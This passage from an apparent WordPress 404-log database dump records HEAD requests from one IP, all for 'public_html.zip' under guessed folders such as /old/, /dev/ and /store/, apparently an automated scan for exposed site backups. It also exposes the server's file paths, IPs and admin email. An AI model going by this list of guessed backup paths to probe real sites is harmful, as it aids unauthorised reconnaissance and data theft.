Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"http://bintara.com.my/newsite/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/newsite/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEAAAAQs\";s:12:\"REDIRECT_URL\";s:24:\"/newsite/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50581\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"http://bintara.com.my/newsite/public_html.zip\";s:10:\"SCRIPT_URL\";s:24:\"/newsite/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEAAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.4875\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35520464,37326984,'http://bintara.com.my/newsite/public_html.zip',1,0,'217.78.6.15'),(27202,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/new/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/new/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/new/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M19s@3O4E744khfb9lAAAABg\";s:12:\"REDIRECT_URL\";s:20:\"/new/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50587\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/new/public_html.zip\";s:10:\"SCRIPT_URL\";s:20:\"/new/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M19s@3O4E744khfb9lAAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.5502\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35512688,37308576,'http://bintara.com.my/new/public_html.zip',1,0,'217.78.6.15'),(27203,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/1/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/1/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/1/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mDwAAARE\";s:12:\"REDIRECT_URL\";s:18:\"/1/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50598\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/1/public_html.zip\";s:10:\"SCRIPT_URL\";s:18:\"/1/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mDwAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.4417\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35519392,37316456,'http://bintara.com.my/1/public_html.zip',1,0,'217.78.6.15'),(27204,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/demo/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/demo/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/demo/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mFQAAARY\";s:12:\"REDIRECT_URL\";s:21:\"/demo/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50592\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/demo/public_html.zip\";s:10:\"SCRIPT_URL\";s:21:\"/demo/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mFQAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.5508\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35513616,37310064,'http://bintara.com.my/demo/public_html.zip',1,0,'217.78.6.15'),(27205,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/oldsite/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"http://bintara.com.my/oldsite/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/oldsite/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1ts@3O4E744khfb9kQAAAAQ\";s:12:\"REDIRECT_URL\";s:24:\"/oldsite/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50586\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"http://bintara.com.my/oldsite/public_html.zip\";s:10:\"SCRIPT_URL\";s:24:\"/oldsite/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1ts@3O4E744khfb9kQAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.4446\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35520072,37320320,'http://bintara.com.my/oldsite/public_html.zip',1,0,'217.78.6.15'),(27206,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/2019/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/2019/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/2019/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEQAAAQ8\";s:12:\"REDIRECT_URL\";s:21:\"/2019/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50600\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/2019/public_html.zip\";s:10:\"SCRIPT_URL\";s:21:\"/2019/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEQAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.5546\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:36',35517360,37312576,'http://bintara.com.my/2019/public_html.zip',1,0,'217.78.6.15'),(27207,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/website/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"http://bintara.com.my/website/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/website/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mDgAAAQc\";s:12:\"REDIRECT_URL\";s:24:\"/website/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50596\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"http://bintara.com.my/website/public_html.zip\";s:10:\"SCRIPT_URL\";s:24:\"/website/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mDgAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.4873\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35518856,37320192,'http://bintara.com.my/website/public_html.zip',1,0,'217.78.6.15'),(27208,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/old/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/old/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/old/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEwAAAQw\";s:12:\"REDIRECT_URL\";s:20:\"/old/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50591\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/old/public_html.zip\";s:10:\"SCRIPT_URL\";s:20:\"/old/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEwAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.4901\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35514776,37310656,'http://bintara.com.my/old/public_html.zip',1,0,'217.78.6.15'),(27209,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/store/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/store/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/store/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M13HYVBlg0Ecqvi9UnwAAAFQ\";s:12:\"REDIRECT_URL\";s:22:\"/store/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50595\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/store/public_html.zip\";s:10:\"SCRIPT_URL\";s:22:\"/store/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M13HYVBlg0Ecqvi9UnwAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.5596\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:20','2019-09-27 17:54:35',35515192,37314896,'http://bintara.com.my/store/public_html.zip',1,0,'217.78.6.15'),(27210,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/dev/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/dev/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/dev/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M16TYgRwQdJ@9I7BUFwAAAJQ\";s:12:\"REDIRECT_URL\";s:20:\"/dev/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50593\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/dev/public_html.zip\";s:10:\"SCRIPT_URL\";s:20:\"/dev/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M16TYgRwQdJ@9I7BUFwAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.5507\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:31','2019-09-27 17:54:36',35514400,37311320,'http://bintara.com.my/dev/public_html.zip',1,0,'217.78.6.15'),(27211,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/portal/public_html.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 